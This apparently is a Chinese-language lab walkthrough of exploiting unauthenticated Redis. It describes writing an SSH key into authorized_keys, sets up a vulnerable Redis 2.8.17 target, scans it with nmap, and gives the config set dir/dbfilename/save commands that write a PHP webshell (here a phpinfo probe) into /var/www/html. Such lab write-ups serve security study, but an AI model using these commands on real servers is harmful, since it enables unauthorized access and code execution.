Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,
如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
下载之后解压出来
tar -zxvf redis-2.8.17.tar.gz
make 进行编译,警告我们可以忽略
make结束后,进入src目录:cd src,将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cp redis-server /usr/bin/
cp redis-cli /usr/bin/
返回目录redis-2.8.17,将redis.conf也拷贝到/etc/目录下:
接着使用/etc/目录下的reids.conf文件中的配置启动redis服务:
由于我端口重复了,所以修改了下端口
port修改成6378
nmap检测
nmap -sV -p- 192.168.111.129
可以看到redis开启了
这里我们为了方便做事,安装个redis clinet
地址:https://github.com/caoxinyu/RedisClient/releases
由于我们换了端口这里也换上,无需密码即可登录
可以看出redis未启用认证。
利用redis写webshell
利用条件
靶机redis未授权,在攻击机能用redis clinet连接,如上图,并未登录验证
靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限
靶机网站路径:/var/www/html/
我们开启http服务
service apache2 start
这里我们调出Console
config set dir /var/www/html
config set dbfilename test.php
config set webshell "<?php phpinfo(); ?>"
save
